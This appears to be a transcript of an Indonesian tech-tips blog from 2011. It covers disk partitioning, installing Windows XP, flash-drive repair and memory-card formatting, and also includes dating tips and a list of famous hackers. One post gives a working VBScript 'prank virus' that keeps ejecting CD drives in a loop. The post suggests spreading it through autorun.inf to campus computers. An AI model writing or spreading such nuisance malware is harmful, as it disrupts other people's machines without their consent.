berbagi ilmu komputer

download berbagi ilmu komputer

of 29

  • date post

    10-Jul-2015
  • Category

    Documents

  • view

    313
  • download

    1

Embed Size (px)

Transcript of berbagi ilmu komputer

Mengubah Background Client Billing Explorer client Bosen dengan background client billing explorer? Berikut ini cara mudah, cepat dan instan mengganti background client billing explorer : 1. Sebelum installasi client, hapus file ikan2.jp_ dalam folder installasi client. Jika masih di dalam winrar extract dulu. 2. Copy gambar berformat jpg ke dalam folder tersebut dan beri nama ikan2.jp_ 3. Buka notepad ketikkan commad berikut : makecab ikan2.jpg ikan2.jp_ makecab 4. Simpan file tersebut dengan nama misal ganti.cmd save 5. Jalankan ganti.cmd, maka akan muncul ikan2.jp_ ganti 6. Delete ganti.cmd dan ikan2.jpg 7. Install client billing explorer, maka tampilannya akan berubah sesuai dengan gambar yang anda masukkan tadi. 8. Selesai, Selamat mencoba .. tips pembagian partisi hdd Sunday, February 20, 2011 9:38 AM Bagi kebanyakan pengguna Komputer (PC) kadang kurang atau tidak begitu memperhatikan masalah pengaturan/penggunaan Hard disk. Biasanya diserahkan ke orang lain, mulai dari pembelian sampai installasi berbagai program lainnya, dan setelah itu tinggal memakai, tidak pernah memperhatikan masalah Hard disk. Berikut tips mengatur pembagian Hard disk sehingga bisa lebih baik dan memudahkan. Dengan semakin murahnya perangkat yang satu ini dan kapasitas yang semakin bertambah, maka penggunaannya pun harus diperhatikan. Maskipun bisa saja kita membagi Hardisk 500 GB Menjadi 1 atau 2 partisi ( drive C: dan drive D:), tetapi hal itu menurut saya merupakan cara yang kurang baik. Berikut tips saya yang sebagian merupakan hasil pengalaman pribadi. Pembagian hardisk memang tidak ada standard khusus, biasanya hal ini berdasarkan pengalaman atau keperluan. Cara terbaik adalah dengan menentukan terlebih dahulu kategori yang akan digunakan. Misalnya Untuk Sistem Operasi, Data, Master Program, Audio/video dan lainnya. HardDisk-Anatomy Perlu diingat bahwa HDD 80 GB (GigaByte) tidak sepenuhnya dapat menyimpan data sebesar 80 GB, demikian juga ketika terbaca di komputer. Untuk HDD 80 GB, biasanya hanya mampu menyimpan data atau akan terbaca maksimal 74 GB. Untuk 40 GB menjadi 37 GB, 160 GB = 149 GB, 250=232 GB, 320 = 298 GB, 500 GB = 465 GB, 640 = 596 GB, 1 TB (TeraByte) = 931 GB dan seterusnya. Sehingga kita tidak bisa membagi HDD 80 GB menjadi 4 drive dengan masing-masing berukuran sama dan terbaca 20 GB semua.

Berikut contoh pembagian HDD 160 GB (terbaca sekitar 149 GB), dengan sistem operasi Windows XP * Drive C : 20 GB (Label winXP, untuk menginstall sistem operasi windows XP dan program lainnya) * Drive D : 40 GB (Label Master, untuk menyimpan berbagai master program sebelum di install) * Drive E : 40 GB (Label Data, untuk menyimpan Data atau Dokumen) * Drive F : 49 GB atau sisanya (Label Media, untuk menyimpan berbagai file audio dan Video) Mengapa drive C hanya berukuran 20 GB ? Bagi kebanyakan orang, drive C sebagai lokasi installasi sistem operasi tidak memerlukan banyak tempat. Untuk Windows XP paling hanya 2 GB, Office sekitar 1 GB dan sisanya berupa program-program lainnya dan biasanya masih mencukupi. Sehingga dengan ukuran yang kecil akan lebih mudah dalam merawatnya, seperti ketika scan virus, spyware, defragment hardisk lebih cepat dan lainnya Dalam mem-format HDD, biasanya ukuran yang dimasukkan dalam MB (Mega Byte). Kemudian Agar HDD terbaca sebesar 20 GB, maka ukuran yang kita masukkan dalam MB harus lebih besar dari 20.000. Misal kita tentukan ukurannya 21.500 MB, maka ukuran ini akan terbaca sekitar 20 GB. Atau bisa ditambah sedikit misalnya 22.000 MB (terbaca 20.5 GB). Demikian juga ketika menentukan ukuran 40 GB ( diisi sekitar 43.000 MB). Untuk lebih mudahnya bisa melihat Konversi GigaByte Memindah Lokasi My Documents Ketika kita membuka Windows Explorer maka akan ada directory My Documents dan pada awalnya lokasi My Documents ini ada di drive C;, lengkapnya biasanya di folder C:\Documents and Settings. Menyimpan dokumen di drive C menurut saya kurang aman, dan perlu dipindah ke Drive selain C. Misalnya dari contoh diatas adalah drive E: Untuk mengubah agar My Documents membuka lokasi drive/folder lainnya, caranya dengan klik kanan My Documents dan pilih Properties kemudian klik tombol Move dan pilih lokasi baru tempat penyimpanan dokumennya, misalnya drive E:. Cara ini hanya merubah lokasi My Documents ke lokasi baru, sehingga jika sudah ada data di My Documents, maka harus dipindah manual ke lokasi baru ini. Data lama tetap masih ada dan tidak terhapus. move-my-documents

Setelah lokasi di pindah/diubah, maka ketika kita menyimpan di My documents, data akan tersimpan di drive/folder baru tesebut ( contoh diatas drive E:), tidak tersimpan di drive C: LANGKAH-LANGKAH INSTALASI OPERATING SISTEM WINDOWS XP Tuesday, February 15, 2011 11:22 AM LANGKAH-LANGKAH INSTALASI OPERATING SISTEM WINDOWS XP (Oleh: BAYU RIYADI 2011) Komputer yang telah kita rakit belumlah bisa digunakan untuk aktifitas bekerja layaknya komputer yang kita temui di kantor-kantor atau rumah, Untuk itulah dibutuhkan Operating System atau Sistem Operasi yang menghubungkan manusia dengan peripheral komputer tersebut, komputer tanpa operating sistem tidak bisa digunakan, ibarat anda punya hape tetapi tidak ada sistem operasi, perlu digarisbawahi atau dicetaktebalkan, sistem operasi bukanlah merupakan suatu software, jadi sistem

operasi =/= software. Lalu apa bedanya ? sebuah software membutuhkan sistem operasi, sistem operasi ini yang menjembatani antara software dengan hardware. Nah sistem operasi di sini yang familiar adalah Microsoft Windows. Windows bukanlah salah satu sistem operasi, ada banyak sistem operasi lain seperti Linux, Sun Microsystem. Mac OS, Symbhian. Sistem operasi diibaratkan sebagai body sebuah mobil, sedang mesinnya adalah hardware-hardware, nah kalo kita ikut menumpang kitalah softwarenya. 1. Siapkan CD Master Microsoft Windows XP. cdwindowscdboxcdwindowshome Dalam pembelian CD Windows XP ada dua pilihan, versi tray dan versi box, untuk versi tray hanya berbentuk cd dan buku manual saja, sedangkan untuk versi box ada boxnya. Masuklah ke menu BIOS untuk mencari fasilitas boot pertama kali lewat CD/DV ROM. Tergantung BIOS yang ada, bisa menekan tombol DEL /ESC/F1 berulang-ulang saat pertama kali komputer di hidupkan. biospos Sebagai contoh ini adalah Award BIOS, pada gambar yang dilingkari ubahlah menjadi CD/DVD, jika sudah simpan perubahan tersebut dengan menekan F10, setelah itu simpan setting tersebut dan keluar. Proses booting akan mendeteksi CD/DVD dahulu, jika benar maka akan muncul proses instalasi Microsoft Windows ( selanjutnya disebut saja dengan Windows ). Tekan sembarang tombol untuk memasuki proses instalasi Windows. xp-setup-0-press-any-key-to 1. CD Windows XP akan dibaca, dan akan keluar keterangan yang membingungkan di bawahnya, itu adalah indikasi bawah Windows sedang meload file-file tertentu untuk proses instalasi. startsetup 2. Jika Windows sudah selesai membaca file-file tersebut maka akan muncul tampilan Welcome Setup berikut welcome Ada 3 pilihan. a. To set up Windows XP now, press ENTER Maksudnya kita kita memulai melakukan instalasi Windows, maka cukup menekan tombol ENTER b. To repair a Windows X installation using Recovery Console, press R Maksudnya bahwa untuk recovery Windows jika terjadi masalah sistem tetapi ini jika kita sudah menginstall Windows terlebih dahulu c. To quit Setup without installaion Windows XP, press F3 Tujuannya adalah membatalkan proses instalasi Windows. 3. Jika kita menekan ENTER maka kita akan menuju langkah selanjutnya yaitu persyaratan untuk tunduk pada Licensing Agreement, dan anda harus menjawabnya dengan menekan F8, jika tidak dijawab atau di tolak maka anda tidak akan dapat meneruskan proses instalasi, jika anda setuju terhadap persyaratan tersebut ( siapa pernah baca peraturan ? ) maka akan masuk tahap berikutnya.

aggraement 4. Jika anda setuju sekarang saatnya masuk ke proses pemilihan partisi hardisk, seandainya hardisk tersebut masuk baru maka akan ada tampilan seperti ini partition Maksudnya proses instalasi membaca adanya satu hardisk yang besarnya 19093 M atau 20 GB, jika anda dah yakin sesuai keberadaan hardisk tersebut tekan enter saja, untuk melakukan proses formating hardisk, format hardisk adalah membentuk blok dan cluster di dalam kepingan hardisk. 5. Proses formating hardisk format Anda bisa memilih tipe partisi, bisa FAT atau NTFS. Jika pilihan sudah benar pilih salah satu dan tekan enter, maka instalasi akan meneruskan ke tahap selanjutnya. formatprosesing Ini contoh proses formating sedang berlangsung. 6. Proses selanjutnya akan secara otomatis meload file-file windows untuk dicopy ke dalam hardisk. copyingfiles Jika selesai tercopy saatnya booting ulang, alias restart dengan sendirinya. Proses instalasi selanjutnya akan dimulai dengan munculnya logo Windows logo newlook 7. Setelah melewati tahap ini kita diminta untuk memasukan parameter yang diminta dalam proses instalasi. Regional and Language Options, adalah memasukan lokasi dan bahasa yang digunakan, untuk bahasa Indonesia saat ini belum ada, kecuali dalam Windows XP Starter Edition. regionalsetting 8. Tahap selanjutnya adalah memasukan nama dan perusahaan anda. user 9. Memasukan 25 key yang ada di box atau cd cdkey 10. Proses selanjutnya memasukan password sistem, password di sini bukan password saat kita masuk ke Windows, tetapi password yang akan digunakan jika kita hendak mereparasi windows atau masuk safe mode passwordsistem 11. Memasukan setting jam dan tanggal serta Time Zone settingjam 12. Setting network bisa anda abaikan dengan tekan typical saja

xp-setup-12-network-setting Sampai tahap ini kita akan menunggu sampai Windows selesai melakukan instalasi, jika proses selesai Windows akan melakukan restart atau booting ulang. Setelah booting ulang maka Windows akan melakukan setting lagi bagi pengguna atau final setup, setting terakhir dan Windows akan mulai bisa digunakan secara default. welcomeafterinstallation Ucapan Welcome to Microsoft Windows jika berhasil akan muncul seperti gambar di atas, kita memasukan nama pengguna dengan menekan tombol di sebelah kanan bawah. Langkah selanjutnya bisa anda teruskan sendiri. xp-setup-17-help-protect-yo xp-setup-18-will-this-compu xp-setup-18b-how-will-this xp-setup-19-ready-to-activa xp-setup-20-ready-to-regist xp-setup-21-collecting-regi xp-setup-22-who-will-use-th xp-setup-23-thank-you Selesai dengan tampilnya desktop Windows XP

winxppro software unutk memperbaiki flash disk Sunday, February 13, 2011 11:23 AM Anda telah melihat masalah yang Anda USB tidak terdeteksi pada PC Anda tidak merusak USB menggunakan Aman Hapus adware. Nah, di sini saya meninggalkan program yang LFF2.36 perbaikan masalah USB Apa yang membuat program ini adalah untuk format USB rendah, sehingga Windows dapat mendeteksi saat kembali terhubung. Dalam beberapa kasus memang ada yang berhasil ada juga yang tidak, itu tergantung dari letak kerusakan, jika memang terletak pada software flashdisk tersebut maka flashdisk pun dapat di gunakan kembali. Tetapi bila letak kerusakan pada komponen nya, maka kerusakan tersebut tidak dapat dibetulkan dengan cara ini. HP Flash Drive Boot Utility (6,4 Mb) Jika yang diatas tidak berhasil, coba yang ini : Flashdisk Repair (136 Kb) memperbaiki flash disk

Sunday, February 13, 2011 11:17 AM Tips Cara Memperbaiki/membetulkan Flash Disk yang mati,untuk bisa memperbaiki flash disk gampanggampang susa untuk memperbaiki flash disk mati biasanya kamu menghadapi seperti ini : Saat flash disk tertancap di komputer win XP, sedang dipakai namun tiba-tiba windows hank alias frozen. Setelah komputer di booting paksa dan di hidupkan lagi, ternyata flash disk yang tertancap tadi mati. Falsh disk tidak bisa bekerja lagi. Windows mendeteksi kapasitasnya 0 MB dan mengeluarkan pesan untuk memformatnya. Dicoba untuk di format gagal juga. Akhirnya gak terpakai lagi deh tuh Flash disk. Kalau memang kasus seperti ini yang anda alami terhadap kerusakan flash disk anda. jangan khawatir kita masih bisa coba untuk menyelamatkan dan menghidupkanya lagi. Berikut ini langkah-langkah untuk memperbaikinya: 1.Softawre yang kita perlukan untuk keperluan ini adalah HP Drive Boot Utility (buatan HP namun jangan khawatir ternyata bisa kita gunakan untuk merek yang lainya. Bahkan untuk memory kamera juga). Anda bisa download di bawah ini. http://h20000.www2.hp.com/bizsupport/TechSupport/SoftwareDescription.jsp?lang=en&cc=us&mode =3&taskId=135&swItem=MTX-UNITY-I23839 2.Setelah di download,jalankan dan pilih drive untuk falsh disk yang akan diperbaiki 3.Pilih tipe format disk yang mau di gunakan (FAT, FAT32 atau NTFS) 4.Pilih Quick Format 5.Kemudian pilih start untuk memulainya selamat mencoba ha..ha..

TIPS MENDAPATKAN PERHATIAN CEWEK Thursday, February 10, 2011 10:55 AM Topic Normal TIPS MENDAPATKAN PERHATIAN CEWEK Post 1. JANGAN PERNAH JAIM Jangan pernah pengen selalu terlihat sebagai co sopan dan baik-baik (kecuali di depan calon mertua). Bersikaplah sedikit bandel dan nakal. ce-ce umumnya lebih suka co yg bandel ketimbang co yg terlalu baik. lebih mempunyai daya pikat dan terlihat tidak membosankan. 2. APA ADANYA Jangan memaksakan diri. kebanyakan co suka berlebihan dalam upayanya menggaet ce. Apalagi kalo urusannya berhubungan dengan uang. gue bilangin ya. uang ga ada hubungannya dengan cinta. uang itu untuk

KENIKMATAN HIDUP. jadi, kalo ada ce sifatnya matre .. itu tandanya dia pengen hidup lebih layak aja tawa Laen halnya kalo emang lo tajir. enak, lo ga usah bingung mikirin ini ce seneng ma gue sejujurnya karena apanya sih?. daripada lo ragu terus, mendingan ntu uang ditabung buat masa depan. rugi kan? lo pake uang buat ngejar ce .. tapi bukannya dapet, malah patah hati buntutnya 3. PERCAYA DIRI lo tipe co minderan? ga pede? pemalu? waduh, gawat .. ada sesuatu yg harus dibenahi. terserah kalo lo merasa nyaman dengan diri lo yg sekarang. Tapi soal PD dah jadi suatu keharusan jaman sekarang ini. dalam hal apapun. dan ingat, PD bukan berarti OVERACT. lagipula, apa sih yg lo minderin? tiap orang kan punya kelebihan masing-masing.. keren TRIK BUAT CO GA PDan: gue ngerti .. kenapa co minderan biasanya selamanya akan tetep minder. karena mereka lebih seneng berkhayal ketimbang berbuat sesuatu. DREAM ON, DREAMER! gini aja deh. biasanya tiap co punya tipe ce impian. nah, dari tipe impian tsb, turunin deh levelnya 2 tingkat, dan kejar ce semacam itu. jadikan itu sebagai latihan, buat mengasah kepercayaan diri. kesannya maenin? ya ga lah. ini semua demi kebaikan. besides, yg namanya jodoh sih siapa tau? mungkin malah yg tadinya cuma sebagai latihan .. bisa berlanjut .. 4. JUJUR, LOW PROFILE, dan GA MEMBUAL! banyak co suka melebih-lebihkan kemampuannya dalam hal menggaet ce. bahkan, melebih-lebihkan apa yg sebenarnya ga dia miliki. yg begini ini sih basi. pake nalar donk. ce yg kita gebet, kalo sampe jadian kan ntar bakal jadi orang yg paling deket sama diri kita. jelas, suatu saat, dia bakal tau belangnya kita. cuma masalah waktu. mendingan juga low profile .. low profile dan misterius itu suatu daya pikat yg luar biasa bagi wanita. Asal tau aja, playboy sekelas Cassanova ga pernah membanggakan betapa banyak ce yg pernah jatuh ke pelukannya. cara dia memikat hati wanita yaitu terutama melalui cara bicaranya, yg mampu menimbulkan rasa

nyaman dan selalu penuh penghargaan. ngayal Naksir 5. PUJI dan HARGAI CE siapa sih orang yg ga seneng dipuji? tapi khusus ce .. hausnya mereka akan pujian memang sangat besar. jangan ragu buat memuji ce. ga ada ruginya. tapi simpel aja. ga usah berlebihan. contohnya kalo ce gebetan lo abis potong rambut, puji dia. bilang, lo hari ini keliatan tambah ok deh .. cukup gitu aja. dijamin ntu ce bakalan tersipu-sipu. dia juga merasa ga sia-sia ke salon. atau kalo ada ce yg bikinin teh buat lo, puji aja. bilang, tehnya enak. simpel, tapi tulus dan malah bikin ntu ce penasaran pengen dipuji lebih jauh lagi. mungkin karena komentarnya terlalu singkat? tapi dijamin, dia bakal tersenyum dan mengucapkan terima kasih. sangat malu Oh cinta 6. CUEK ce itu aneh. semakin disakiti, semakin besar pula rasa cintanya. tapi gue ga mau ngasih saran buat nyakitin ce. terlalu ekstrim, meskipun pasti berhasil. cuek dah cukup. tapi pada tempatnya. satu yg harus dilakukan, cueklah, terutama kalo ce lagi mancing-mancing rasa cemburu lo. naturally, ce itu seneng banget diperhatiin. dan bagi mereka, memancing rasa cemburu co adalah suatu permainan yg menyenangkan. gue kasih tau deh. kita sebagai co mesti pinter-pinter tau gelagat ce kalo lagi pengen bikin cemburu. percuma kesel, mending ikutin aja permainannya. kalo dia muji co laen, puji juga co tersebut. atau pokoknya secara overall, cuekin aja. pura-pura ga tau. dijamin nanti malah ce-nya yg geregetan, karena ngeliat usahanya narik perhatian ga berhasil. mereka jadi tambah penasaran .. dan tambah cinta .. biarin aja. rasain ndiri. lagian ce kadang-kadang emang suka aneh-aneh aja sih caranya .. hohoho CUEK YG FORBIDDEN: - cuek ga tau atau lupa ultah ce. YOURE DEAD, MAN!

- cuek kalo ce lagi sakit - cuek dalam hal-hal urgent lainnya _________________ 7. TEGAS dan BERANI BERKATA TIDAK kalo lo ga setuju terhadap sesuatu hal, katakan pendapat lo. jangan diem aja. dan jangan nurut terus apa maunya ce lo. biasain diskusi, toh dia orang yg deket buat lo. lo iyain terus apa kata ce lo? hah! gue pastikan lo bakal jadi tipe suami takut istri nantinya .. garing 8. ASAH KEMAMPUAN BERKOMUNIKASI sekali aja, pada saat lo lagi pdkt, ce-nya merasa lo ga asyik buat diajak ngobrol, YOURE DEAD! siap-siap aja buat patah hati. kecuali .. ada suatu perubahan besar .. kalo ngobrol tu ye, ga perlu lah .. pake bahasa yg tinggi-tinggi .. ribet amat. ngebosenin tau. yg nyante-nyante aja .. mau setinggi apapun jabatan seseorang, sama aja, kalo sama kekasih atau istri sendiri sih pasti maunya lepas dan biasa-biasa aja. mudah-mudahan ga ada deh yg ngalamin kejadian-kejadian mengerikan ini: mendadak jadi kaku, mati gaya, atau kehabisan bahan obrolan .. kalaupun itu semua terjadi, siasati dengan sedikit rangkulan, genggaman tangan, atau rayuan. dan jangan lupa. This one little thing is always work in every circumstances. A JOKE! hehehe 9. SELALU JADI PENDENGAR YG BAIK yang ce butuhin dari co itu sebetulnya sederhana. co yg mau dengerin dia kalo dia lagi pengen curhat, dan co yg mau meluk untuk menghibur dirinya kalo dia lagi sedih. terkadang, co suka egois dan males dengerin curhat ce-nya. malah kalopun dengerin, komentarnya ngaco dan ga bisa jadi solusi. soal curhatnya ce, gini .. kalo ce lagi curhat, dengerin aja semuanya dulu. iyain aja. kalo dah ngerti permasalahannya, baru kasih tanggapan. dan cara nanggapin juga jangan sampe salah. ce, kalo lagi curhat itu bukan pengen dikritik. tapi didukung. kalo ternyata ce-nya itu yg

salah? ya kasih pengertian, tapi jangan bilang kalo dia salah. ntar malah ngambek lagi. priiiiittt 10. BUNGA dan BONEKA selalu berhasil untuk memikat hati wanita. khusus boneka, untuk memikat hati ABG tepatnya. tawa tapi betul kok. soal bunga, ga usah banyak-banyak. setangkai aja. dan jangan keseringan. pada hari spesial aja. malu takut dikomentarin: masa co beli dan bawa-bawa bunga ama boneka sih? cuekin aja. namanya juga usaha. positive thinking aja. selama bisa bikin berhasil, kenapa ga? Hmmm... TaSyA_sAbAkU Post 4. JUJUR, LOW PROFILE, dan GA MEMBUAL! banyak co suka melebih-lebihkan kemampuannya dalam hal menggaet ce. bahkan, melebih-lebihkan apa yg sebenarnya ga dia miliki. yg begini ini sih basi. pake nalar donk. ce yg kita gebet, kalo sampe jadian kan ntar bakal jadi orang yg paling deket sama diri kita. jelas, suatu saat, dia bakal tau belangnya kita. cuma masalah waktu. mendingan juga low profile .. low profile dan misterius itu suatu daya pikat yg luar biasa bagi wanita. Asal tau aja, playboy sekelas Cassanova ga pernah membanggakan betapa banyak ce yg pernah jatuh ke pelukannya. cara dia memikat hati wanita yaitu terutama melalui cara bicaranya, yg mampu menimbulkan rasa nyaman dan selalu penuh penghargaan. ngayal Naksir sep dah ( Sip Sip ) 5. PUJI dan HARGAI CE siapa sih orang yg ga seneng dipuji? tapi khusus ce .. hausnya mereka akan pujian memang sangat besar. jangan ragu buat memuji ce. ga ada ruginya. tapi simpel aja. ga usah berlebihan. contohnya kalo ce gebetan lo abis potong rambut, puji dia. bilang, lo hari ini keliatan tambah ok deh .. cukup gitu aja. dijamin ntu ce bakalan tersipu-sipu. dia juga merasa ga sia-sia ke salon. atau kalo ada ce yg bikinin teh buat lo, puji aja. bilang, tehnya enak. simpel, tapi tulus dan malah bikin ntu ce penasaran pengen

dipuji lebih jauh lagi. mungkin karena komentarnya terlalu singkat? tapi dijamin, dia bakal tersenyum dan mengucapkan terima kasih. sangat malu Oh cinta Biz na Diancem Terpaksa DeCh Kasi PujiaNcape deh awas loe BTW tuop deCh ...... Sya .... Arigato ...... sep dah maaf " The SAMe JuTsu Won't WorK On Me Twice "

Mengambil gambar dari microsoft word untuk jadi format jpeg Thursday, February 10, 2011 10:28 AM Mengambil gambar dari microsoft word untuk jadi format jpeg Bingung sih awalnya kepengen ambil gambar Ms.word. Ketika di copy di Ms Word, trus di paste di dektop. Eh malah jadi berubah Scrap. Duh , sempet sebel. Akhirnya ketemu juga caranya. Jreng Heee Cara 1 Copy gambar dari Microsoft Office, kemudian buka di Microsoft Power Point, Paste di satu slide. Simpan Hasil slide dengan format Jpeg. Pilih tempat gambar yang akan di simpan. Cara 2 Buka gambar di mirosoft Office, kemudian simpan file tersebut dengan format html. Pilih lokasi tempat menyimpan file itu. Setelah disimpan file tersebut. Buka file itu dengan menggunakan Program untuk browsing, misalnya IE, Opera atau Mozilla. Ambil gambar yang diinginkan. cara nya klik kanan , save image. Selamat Mencoba . memperbaiki kartu memori Thursday, February 10, 2011 9:31 AM Kartu memori tergolong barang yang mudah rusak. Banyak faktor penyebabnya. Panas yang berlebih, pengaruh medan magnet yang kuat, kerusakan fisik karena kesalahan waktu mencabut atau memasukkannya ke slot

memori, adalah diantaranya. Kerusakan kartu memori juga bisa disebabkan karena sering dipindah-pindahkan ke perangkat lain. Misal, kartu MMC ponsel Anda juga sering dipasangkan pada kamera digital. Kerusakan pada kartu memori diistilahkan memori corrupt. Kerusakan ini terjadi karena rusaknya sistem file (bukan kerusakan fisik) ciri-cirinya, memorinya tidak terdeteksi, atau terdeteksi tetapi tidak bisa dibuka. Menggunakan card reader yang terhubung ke PC. Caranya, Format Lewat menu Windows Explorer. 1. Cabut kartu memori dari ponsel, masukkan ke memori card reader. Perhatikan : jangan sembarangan mencabut memori dari ponsel. Khususnya pada ponsel dengan slot memori

hotswap seperti pada N70, gunakan menu Remove Memory untuk mencabut memori ketika ponsel aktif. Untuk ponsel tanpa menu Remove Memory, sebaiknya nonaktifkan ponsel terlebih dahulu. 2. Cari drive kartu memori (lihat di menu Windows Eksploler), misalnya pada drive (D,E,F,G,H atau lainnya). Jika memori sudah terbaca, klik tombol kanan mouse, dan pilih menu Format. Selanjutnya muncul pilihan jenis format (FAT, FAT32 dan NTSC), pastikan Anda memilih sistim format file FAT. 3. Klik tombol Format Now dan tunggu hingga selesai. Jika muncul pesan error kemudian PC tidak bisa memformat lagi, gunakan cara lain yakni format lewat menu Command link. "Format lewat Commandp" line

1. Di PC, klik start > Run, dan ketik CMD. Jendela Command akan terlihat pada mode DOS prompt. 2. Selanjutnya ketik FORMAT h: / FS:FAT (h=drive letak kartu memori, jika kartu memori terletak di drive g, maka tulis g) 3. Tunggu hingga selesai. Jika masih muncul masalah pada kartu memori, silahkan gunakan memory card reader lain. Tetapi jika memang sudah tidak bisa dipulihkan kembali, terpaksa kartu memori tersebut harus ditukar dengan penjualnya, jika masih bergaransi. Format dengan Software Selain dengan cara diatas, format kartu yang bermasalah bisa juga dilakukan dengan menggunakan software khusus. Misalnya untuk kartu MMC tersedia software MMCmedic yang bisa didownload dari

14 Hacker Terbaik Dunia Thursday, February 10, 2011 9:08 AM 14 Hacker Terbaik Dunia Hacker adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan. Berikut beberapa profile 14 Hacker Terbaik Dunia untuk saat ini : 1. Kevin Mitnick Kevin adalah hacker pertama yang wajahnya terpampang dalam poster FBI Most Wanted. Kevin juga seorang Master of Deception dan telah menulis buku yang berjudul The Art of Deception. Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem. 2. Linus Torvalds Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari LINUS MINIX. Sistem operasi Linux telah menjadi sistem operasi standar hacker. Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux. 3. John Draper Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal. Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker) Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis. Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut Blue Box. 4. Mark Abene Sebagai salah seorang Master of Deception phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine. Menggunakan komputer Apple , Timex Sinclair dan Commodore 64. Komputer pertamanya adalah Radio Shack TRS-80 (trash-80). 5. Robert Morris Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).

Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988. Meng-infeksi ribuan komputer yang terhubung dalam jaringan. 6. Richard Stallman Salah seorang Old School Hacker, bekerja pada lab Artificial Intelligence MIT. Merasa terganggu oleh software komersial dan dan hak cipta pribadi. Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX. Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun. 7. Kevin Poulsen Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2. 8. Ian Murphy Ian Muphy bersama 3 orang rekannya, melakukan hacking ke dalam komputer AT&T dan menggubah seting jam internal-nya. Hal ini mengakibatkan masyarakat pengguna telfon mendapatkan diskon tengah malam pada saat sore hari, dan yang telah menunggu hingga tengah malam harus membayar dengan tagihan yang tinggi. 9. Vladimir Levin Lulusan St. Petersburg Tekhnologichesky University. Menipu komputer CitiBank dan meraup keuntungan 10 juta dollar. Ditangkap Interpol di Heathrow Airport pada tahun 1995 10. Steve Wozniak Membangun komputer Apple dan menggunakan blue box untukkepentingan sendiri. 11. Tsutomu Shimomura Berhasil menangkap jejak Kevin Mitnick. 12. Dennis Ritchie dan Ken Thomson Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson menulis sistem operasi UNIX yang elegan. 13. Eric Steven Raymond Bapak hacker. Seorang hacktivist dan pelopor opensource movement. Menulis banyak panduan hacking, salah satunya adalah: How To Become A Hacker dan The new hackers Dictionary. Begitu fenomenal dan dikenal oleh seluruh masyarakat hacking dunia. Menurut Eric, dunia mempunyai banyak persoalan menarik danmenanti untuk dipecahkan.

14. Johan Helsingius Mengoperasikan anonymous remailer paling populer didunia. membuat virus nakal Tuesday, February 08, 2011 1:56 PM Yuk buat Virus Nakal, buat ngerjain dosen/guru yang kita ngga suka, lagi suntuk di ruang labkom kampus, pusing ngga bisa maen facebook karena diblokir sama admin labkom, yah iseng2 buatin scripts .vbs.

Caranya: Buka notepad dan masukkan code berikut, Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop

Simpanlah dengan file tadi dengan ekstensi file iseng.vbs ato apapun nama kesukaan asalkan pastikan ekstensinya .vbs, dan jalankan filenya ( Klik 2x), perhatikan CD/DVD ROM akan terbuka/tertutup dengan sendirinya tanpa henti. Cara membuat virus nakal

Salah satu cara menghentikan aksi Virus Nakal ini ialah dengan menekan tombol CRTL+ALT+DEL dan matikan proses wscripts.exe, Kalo mau keren lagi, masukkan ke file autorun.inf di flashdisk anda, jadi setiap loe colokin ke kompie kampus, maka akan otomatis dijalankan Virus Nakal ini. NB: kl males atau ga tau cara copasnya. download ajah linknya dibawah: Lanjut: http://www.hong.web.id/tutorial/cara-membuat-virus-nakal#ixzz1DLbRfPUG

situs nya ini software flash disk Tuesday, February 08, 2011 1:36 PM download software untuk memperbaiki flash disk Manfaatkan Flashdisk Yang Mati Tuesday, February 08, 2011 1:33 PM Manfaatkan Flashdisk Yang Mati awalnya seh gr2 flashdisk mati, kya'y gra2 virus or jarang nge-unplug or unmount tuh flashdisk, e..jd mati beneran...di windows nge-plug tp gak bisa diformat n gak bisa di pake..akhirnya..karena emg aku orang miskin yg ga bsa bli flashdisk aku cari akal gmana caranya supaya flashdisk kesayanganku itu hidup kembali...**bangkit lagi** dengan penuh perjuangan akhirnya ku coba pake windows, ternya memang gak bisa diformat, tapi kecerahanku mulai tiba ketika kucuba pake LINUX SLAX-KILLBILL or slax yg lain, pake KNOPPIX jg bisa, or pke linux pa lah, yg penting bisa bootCD or LIVECD tp disarananin wat yg pemula pake SLAX KillBill aja..coz lebih mudah caranya, yg pasti skrg udh di OS LIVECD or LINUX so... Caranya : 1. Coba "colokin" flashdisk pada lubang or tempatnya, Port USB 2. Perhatikan, apakah flashdisk masih terbaca or minimal lampunya nyala.. 3. Buka Console lalu ketik $ CFDISK /dev/sda1 atau /sda__ sesuai dengan flashdisk keberapa yg kita "colok" ke komputer, tp dr pada flasdisk yg lain beresiko datanya hilang, maka disaranin agar copot dulu flashdisk yg lain, so tinggalin flashdisk yg rusak td sendirian. 4. nah..klo dah dicolokin, trus dah diketik $ cfdisk /dev/sda1 terus Delete or hapus tuh Partisi flashdisk 5. CREATE NEW or buat baru lagi partisi tuh flashdisk yg rusak, trus klo udah, di WRITE==> trus yes 6. nah..klo udah skrg 